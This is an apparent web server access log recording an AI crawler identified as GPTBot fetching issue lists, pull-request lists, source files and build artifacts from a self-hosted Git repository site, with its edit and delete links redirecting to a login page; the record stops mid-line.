303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -[17/Feb/2026:19:42:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -[17/Feb/2026:19:42:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -[17/Feb/2026:19:42:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -[17/Feb/2026:19:42:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 32259343] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -[17/Feb/2026:19:42:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -[17/Feb/2026:19:42:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -[17/Feb/2026:19:42:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?state=closed&type=all" [Client 74.7.227.38] [Length 10128] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" -[17/Feb/2026:19:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11363] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11581] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:42:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11579] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:42:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md?display=rendered" [Client 74.7.227.38] [Length 17128] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" -[17/Feb/2026:19:42:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py?display=source" [Client 74.7.227.38] [Length 15141] [Gzip 4.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" -[17/Feb/2026:19:42:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat?display=source" [Client 74.7.227.38] [Length 14589] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" -[17/Feb/2026:19:42:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:42:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:42:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:42:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:42:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:42:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10147] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:42:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:42:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:42:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11581] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:42:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11581] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:42:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11583] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:42:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:42:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9957] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:42:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:42:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:42:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:42:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 7471] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:19:42:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 7471] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:19:42:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 6593] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:19:42:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:42:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9955] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:42:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:42:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:42:41 +0000] - 200 200 - GET https 